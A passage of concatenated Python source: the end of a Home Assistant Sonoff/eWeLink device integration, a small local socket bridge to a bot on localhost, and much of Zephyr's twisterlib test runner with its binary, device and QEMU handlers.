'nonce' : ''.join(random.choice(string.ascii_lowercase + string.digits) for _ in range(8)),
'apkVersion': "1.8",
'os' : 'iOS',
'at' : self._sonoffewe.get_bearer_token(),
'apikey' : self._sonoffewe.get_user_apikey(),
'ts' : str(int(time.time())),
'model' : self._sonoffewe.get_model(),
'romVersion': self._sonoffewe.get_romVersion(),
'sequence' : str(time.time()).replace('.','')
}
self.send(json.dumps(payload))
def on_close(self, *args):
_LOGGER.debug('websocket closed')
self.connected = False
def run_forever(self, sockopt=None, sslopt=None, ping_interval=0, ping_timeout=None):
websocket.WebSocketApp.run_forever( self,
sockopt=sockopt,
sslopt=sslopt,
ping_interval=ping_interval,
ping_timeout=ping_timeout)
class SonoffeweDevice(Entity):
"""Representation of a Sonoffewe device"""
def __init__(self, hass, device):
"""Initialize the device."""
self._outlet = None
self._sensor = None
self._state = None
self._hass = hass
self._deviceid = device['deviceid']
self._available = device['online']
self._attributes = {
'device_id' : self._deviceid,
}
def get_device(self):
for device in self._hass.data[DOMAIN].get_devices():
if 'deviceid' in device and device['deviceid'] == self._deviceid:
return device
return None
def get_state(self):
device = self.get_device()
# Pow & Pow R2:
if 'power' in device['params']:
self._attributes['power'] = device['params']['power']
# Pow R2 only:
if 'current' in device['params']:
self._attributes['current'] = device['params']['current']
if 'voltage' in device['params']:
self._attributes['voltage'] = device['params']['voltage']
if 'dusty' in device['params']:
self._attributes['dusty'] = device['params']['dusty']
if 'light' in device['params']:
self._attributes['light'] = device['params']['light']
if 'noise' in device['params']:
self._attributes['noise'] = device['params']['noise']
# TH10/TH16
if 'currentHumidity' in device['params'] and device['params']['currentHumidity'] != "unavailable":
self._attributes['humidity'] = device['params']['currentHumidity']
if 'currentTemperature' in device['params'] and device['params']['currentTemperature'] != "unavailable":
self._attributes['temperature'] = device['params']['currentTemperature']
if 'humidity' in device['params'] and device['params']['humidity'] != "unavailable":
self._attributes['humidity'] = device['params']['humidity']
if 'temperature' in device['params'] and device['params']['temperature'] != "unavailable":
self._attributes['temperature'] = device['params']['temperature']
if 'rssi' in device['params']:
self._attributes['rssi'] = device['params']['rssi']
# the device has more switches
if self._outlet is not None:
return device['params']['switches'][self._outlet]['switch'] == 'on' if device else False
else:
return device['params']['switch'] == 'on' if device else False
def get_available(self):
device = self.get_device()
return device['online'] if device else False
@property
def should_poll(self):
"""Return the polling state."""
return True
@property
def name(self):
"""Return the name of the switch."""
return self._name
@property
def available(self):
"""Return true if device is online."""
return self.get_available()
# @Throttle(MIN_TIME_BETWEEN_UPDATES)
def update(self):
"""Update device state."""
        # we don't update here because there's a single thread that can be active
        # at any time, and the websocket will send the state update messages
pass
@property
def device_state_attributes(self):
"""Return device specific state attributes."""
return self._attributes
|
local_bridge.py
|
from socket import socket, AF_INET, SOCK_STREAM
from threading import Thread
import json
import asyncio
ip = '127.0.0.1'
port = 5001
#class ServerThread(Thread):
# def __init__(self, q_main, q_worker):
# self.queue_main = q_main
# self.queue_worker = q_worker
# super().__init__()
# def run(self):
# while True:
# sleep(1)
# self.queue_main.put('run help')
# item = self.queue_worker.get() # waits for item from main thread
# print('Received ', item)
#def sock_connect():
# try:
# print('Thread start')
# sock = socket(AF_INET, SOCK_STREAM)
# sock.connect(('127.0.0.1', 5001))
# except KeyboardInterrupt:
# sock.close()
#
#thread = Thread(target = sock_connect)
#thread.start()
def set_addr(ip_, port_):
global ip, port
ip=ip_
port =port_
def send_to_bot(data: dict):
json_data = json.dumps(data)
sock = socket(AF_INET, SOCK_STREAM)
resp = None
try:
        sock.connect((ip, port))
sock.send(json_data.encode())
resp = json.loads(sock.recv(4096))
except Exception as e:
print(e)
finally:
try:
sock.close()
except:
pass
finally:
return resp
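# Illustrative usage (assumes a bot process listening on the configured address;
# the payload keys are hypothetical):
#   set_addr('127.0.0.1', 5001)
#   resp = send_to_bot({'cmd': 'status'})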
|
twisterlib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
import json
from multiprocessing import Lock, Process, Value
from typing import List
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
try:
import pty
except ImportError as capture_error:
if os.name == "nt": # "nt" means that program is running on Windows OS
pass # "--device-serial-pty" option is not supported on Windows OS
else:
raise capture_error
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts",
"python-devicetree", "src"))
from devicetree import edtlib # pylint: disable=unused-import
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
import scl
import expr_parser
logger = logging.getLogger('twister')
logger.setLevel(logging.DEBUG)
class ExecutionCounter(object):
def __init__(self, total=0):
self._done = Value('i', 0)
self._passed = Value('i', 0)
self._skipped_configs = Value('i', 0)
self._skipped_runtime = Value('i', 0)
self._skipped_cases = Value('i', 0)
self._error = Value('i', 0)
self._failed = Value('i', 0)
self._total = Value('i', total)
self._cases = Value('i', 0)
self.lock = Lock()
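        # Each counter is a multiprocessing.Value so parallel workers can update
        # it; the property accessors below take the per-value lock around every
        # read and write.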
@property
def cases(self):
with self._cases.get_lock():
return self._cases.value
@cases.setter
def cases(self, value):
with self._cases.get_lock():
self._cases.value = value
@property
def skipped_cases(self):
with self._skipped_cases.get_lock():
return self._skipped_cases.value
@skipped_cases.setter
def skipped_cases(self, value):
with self._skipped_cases.get_lock():
self._skipped_cases.value = value
@property
def error(self):
with self._error.get_lock():
return self._error.value
@error.setter
def error(self, value):
with self._error.get_lock():
self._error.value = value
@property
def done(self):
with self._done.get_lock():
return self._done.value
@done.setter
def done(self, value):
with self._done.get_lock():
self._done.value = value
@property
def passed(self):
with self._passed.get_lock():
return self._passed.value
@passed.setter
def passed(self, value):
with self._passed.get_lock():
self._passed.value = value
@property
def skipped_configs(self):
with self._skipped_configs.get_lock():
return self._skipped_configs.value
@skipped_configs.setter
def skipped_configs(self, value):
with self._skipped_configs.get_lock():
self._skipped_configs.value = value
@property
def skipped_runtime(self):
with self._skipped_runtime.get_lock():
return self._skipped_runtime.value
@skipped_runtime.setter
def skipped_runtime(self, value):
with self._skipped_runtime.get_lock():
self._skipped_runtime.value = value
@property
def failed(self):
with self._failed.get_lock():
return self._failed.value
@failed.setter
def failed(self, value):
with self._failed.get_lock():
self._failed.value = value
@property
def total(self):
with self._total.get_lock():
return self._total.value
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
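    # Illustrative cache line (made-up entry): 'ZEPHYR_TOOLCHAIN_VARIANT:STRING=zephyr'
    # parses to CMakeCacheEntry(name='ZEPHYR_TOOLCHAIN_VARIANT', value='zephyr').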
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
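        # e.g. _to_bool('ON') -> 1, _to_bool('2') -> True,
        # _to_bool('FOO-NOTFOUND') -> 0 (illustrative inputs)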
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class TwisterException(Exception):
pass
class TwisterRuntimeError(TwisterException):
pass
class ConfigurationError(TwisterException):
def __init__(self, cfile, message):
TwisterException.__init__(self, cfile + ": " + message)
class BuildError(TwisterException):
pass
class ExecutionError(TwisterException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/pylib/twister"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
self.terminated = False
def set_state(self, state, duration):
self.state = state
self.duration = duration
def get_state(self):
ret = (self.state, self.duration)
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
def terminate(self, proc):
        # Encapsulate the terminate functionality so we do it consistently wherever
        # we might want to terminate the proc. We need try_kill_process_by_pid
        # because of how both newer ninja (1.6.0 or greater) and .NET / renode
        # work. Newer ninja versions don't seem to pass SIGTERM down to their
        # children, so we need to use try_kill_process_by_pid as well.
for child in psutil.Process(proc.pid).children(recursive=True):
try:
os.kill(child.pid, signal.SIGTERM)
except ProcessLookupError:
pass
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def add_missing_testscases(self, harness):
"""
        If the testsuite was interrupted by some error (e.g. a timeout), it is
        necessary to add information about the remaining testcases, which were
        not performed because of that error.
"""
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
def _set_skip_reason(self, harness_state):
"""
        If a testcase written in the ztest framework is skipped by the
        "ztest_test_skip()" function, it is marked in the instance.results dict
        as "SKIP", but the reason for the skip is still "Unknown". This method
        picks up that situation and sets instance.reason properly.
"""
harness_state_pass = "passed"
harness_testcase_result_skip = "SKIP"
instance_reason_unknown = "Unknown"
if harness_state == harness_state_pass and \
self.instance.reason == instance_reason_unknown and \
harness_testcase_result_skip in self.instance.results.values():
self.instance.reason = "ztest skip"
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def _output_reader(self, proc):
self.line = proc.stdout.readline()
def _output_handler(self, proc, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
timeout_extended = False
timeout_time = time.time() + self.timeout
while True:
this_timeout = timeout_time - time.time()
if this_timeout < 0:
break
reader_t = threading.Thread(target=self._output_reader, args=(proc,), daemon=True)
reader_t.start()
reader_t.join(this_timeout)
if not reader_t.is_alive():
line = self.line
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
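                # Once the harness has reported a state, only keep reading
                # briefly: 30 s while coverage data is still being captured,
                # otherwise 2 s.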
if harness.state:
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
else:
reader_t.join(0)
break
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_handler, args=(proc, harness,), daemon=True)
t.start()
t.join()
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
self.try_kill_process_by_pid()
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
if sys.stdout.isatty():
subprocess.call(["stty", "sane"])
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.add_missing_testscases(harness)
self._set_skip_reason(harness.state)
self.record(harness)
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
if harness.is_pytest:
harness.handle(None)
return
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
if self.coverage:
# Set capture_coverage to True to indicate that right after
# test results we should get coverage data, otherwise we exit
# from the test.
harness.capture_coverage = True
ser.flush()
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
if not harness.capture_coverage:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
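        # Look for a DUT that matches the platform, provides any required
        # fixture and has a serial connection; the per-DUT lock guards the
        # availability flag so concurrent handlers do not grab the same device.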
for d in self.suite.duts:
if fixture and fixture not in d.fixtures:
continue
if d.platform != device or not (d.serial or d.serial_pty):
continue
d.lock.acquire()
avail = False
if d.available:
d.available = 0
d.counter += 1
avail = True
d.lock.release()
if avail:
return d
return None
def make_device_available(self, serial):
for d in self.suite.duts:
if d.serial == serial or d.serial_pty:
d.available = 1
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, stderr = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
if proc.returncode != 0:
logger.error(f"Custom script failure: {stderr.decode(errors='ignore')}")
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
runner = None
hardware = self.device_is_available(self.instance)
while not hardware:
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.device_is_available(self.instance)
runner = hardware.runner or self.suite.west_runner
serial_pty = hardware.serial_pty
ser_pty_process = None
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware.serial
logger.debug(f"Using serial device {serial_device} @ {hardware.baud} baud")
if (self.suite.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash and self.suite.west_flash != []:
command_extra_args.extend(self.suite.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.probe_id or hardware.id
product = hardware.product
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--dev-id")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
elif runner == "stm32cubeprogrammer":
command.append("--tool-opt=sn=%s" % (board_id))
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.pre_script
post_flash_script = hardware.post_flash_script
post_script = hardware.post_script
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=hardware.baud,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
if serial_pty and ser_pty_process:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
# ignore unencodable unicode chars
logger.debug(stdout.decode(errors = "ignore"))
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
os.write(write_pipe, b'x') # halt the thread
out_state = "flash_error"
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state in ["timeout", "flash_error"]:
self.add_missing_testscases(harness)
if out_state == "timeout":
self.instance.reason = "Timeout"
elif out_state == "flash_error":
self.instance.reason = "Flash error"
if harness.is_pytest:
harness.pytest_run(self.log)
self.instance.results = harness.tests
        # Some test instances finish without producing any results (an empty
        # dictionary). Mark their cases as BLOCK so they still appear in the
        # final report.
if self.instance.results == {}:
for k in self.instance.testcase.cases:
self.instance.results[k] = 'BLOCK'
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
self._set_skip_reason(harness.state)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
    We need to do this because once QEMU starts, it runs forever until killed.
    Test cases emit special messages to the console as they run; we check
    for these to determine whether each test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(instance.build_dir, "qemu.pid")
if "ignore_qemu_crash" in instance.testcase.tags:
self.ignore_qemu_crash = True
self.ignore_unexpected_eof = True
else:
self.ignore_qemu_crash = False
self.ignore_unexpected_eof = False
@staticmethod
def _get_cpu_time(pid):
"""get process CPU time.
        The guest virtual time in QEMU icount mode isn't host time; it is
        maintained by counting guest instructions, so we use the QEMU
        process execution time to approximate the guest OS time.
"""
proc = psutil.Process(pid)
cpu_time = proc.cpu_times()
return cpu_time.user + cpu_time.system
@staticmethod
def _thread(handler, timeout, outdir, logfile, fifo_fn, pid_fn, results, harness,
ignore_unexpected_eof=False):
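        """Monitor the QEMU console FIFOs and feed output to the harness.
        Runs in a daemon thread: it creates the <fifo>.in/<fifo>.out named
        pipes, polls QEMU's output byte by byte, applies the timeout and
        extension logic, and records the final verdict on the handler.
        """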
fifo_in = fifo_fn + ".in"
fifo_out = fifo_fn + ".out"
# These in/out nodes are named from QEMU's perspective, not ours
if os.path.exists(fifo_in):
os.unlink(fifo_in)
os.mkfifo(fifo_in)
if os.path.exists(fifo_out):
os.unlink(fifo_out)
os.mkfifo(fifo_out)
# We don't do anything with out_fp but we need to open it for
# writing so that QEMU doesn't block, due to the way pipes work
out_fp = open(fifo_in, "wb")
# Disable internal buffering, we don't
# want read() or poll() to ever block if there is data in there
in_fp = open(fifo_out, "rb", buffering=0)
log_out_fp = open(logfile, "wt")
start_time = time.time()
timeout_time = start_time + timeout
p = select.poll()
p.register(in_fp, select.POLLIN)
out_state = None
line = ""
timeout_extended = False
pid = 0
if os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
while True:
this_timeout = int((timeout_time - time.time()) * 1000)
if this_timeout < 0 or not p.poll(this_timeout):
try:
if pid and this_timeout > 0:
                        # It is possible we polled nothing because the host
                        # did not schedule enough CPU time to the QEMU process
                        # during p.poll(this_timeout).
cpu_time = QEMUHandler._get_cpu_time(pid)
if cpu_time < timeout and not out_state:
timeout_time = time.time() + (timeout - cpu_time)
continue
except ProcessLookupError:
out_state = "failed"
break
if not out_state:
out_state = "timeout"
break
if pid == 0 and os.path.exists(pid_fn):
pid = int(open(pid_fn).read())
if harness.is_pytest:
harness.handle(None)
out_state = harness.state
break
try:
c = in_fp.read(1).decode("utf-8")
except UnicodeDecodeError:
# Test is writing something weird, fail
out_state = "unexpected byte"
break
if c == "":
# EOF, this shouldn't happen unless QEMU crashes
if not ignore_unexpected_eof:
out_state = "unexpected eof"
break
line = line + c
if c != "\n":
continue
# line contains a full line of data output from QEMU
log_out_fp.write(line)
log_out_fp.flush()
line = line.strip()
logger.debug(f"QEMU ({pid}): {line}")
harness.handle(line)
if harness.state:
                # If we have already registered a failure, make sure the state
                # is not overridden by a spurious success message coming from
                # the testsuite.
if out_state not in ['failed', 'unexpected eof', 'unexpected byte']:
out_state = harness.state
                # If we get some state, the test is making progress: reset the
                # timeout and wait 2 more seconds to catch anything printed
                # late. We wait much longer if code coverage is enabled, since
                # dumping that information can take some time.
if not timeout_extended or harness.capture_coverage:
timeout_extended = True
if harness.capture_coverage:
timeout_time = time.time() + 30
else:
timeout_time = time.time() + 2
line = ""
if harness.is_pytest:
harness.pytest_run(logfile)
out_state = harness.state
handler.record(harness)
handler_time = time.time() - start_time
logger.debug(f"QEMU ({pid}) complete ({out_state}) after {handler_time} seconds")
if out_state == "timeout":
handler.instance.reason = "Timeout"
handler.set_state("failed", handler_time)
elif out_state == "failed":
handler.instance.reason = "Failed"
handler.set_state("failed", handler_time)
elif out_state in ['unexpected eof', 'unexpected byte']:
handler.instance.reason = out_state
handler.set_state("failed", handler_time)
else:
handler.set_state(out_state, handler_time)
log_out_fp.close()
out_fp.close()
in_fp.close()
        if pid:
            try:
                os.kill(pid, signal.SIGTERM)
            except ProcessLookupError:
                # Oh well, as long as it's dead! User probably sent Ctrl-C
                pass
os.unlink(fifo_in)
os.unlink(fifo_out)
def handle(self):
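        """Launch QEMU through the generator's 'run' target and wait for it.
        A monitor thread (QEMUHandler._thread) consumes the console FIFOs;
        this method supervises the QEMU process itself and derives the final
        status from its return code and the harness state.
        """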
self.results = {}
self.run = True
# We pass this to QEMU which looks for fifos with .in and .out
# suffixes.
self.fifo_fn = os.path.join(self.instance.build_dir, "qemu-fifo")
self.pid_fn = os.path.join(self.instance.build_dir, "qemu.pid")
if os.path.exists(self.pid_fn):
os.unlink(self.pid_fn)
self.log_fn = self.log
harness_import = HarnessImporter(self.instance.testcase.harness.capitalize())
harness = harness_import.instance
harness.configure(self.instance)
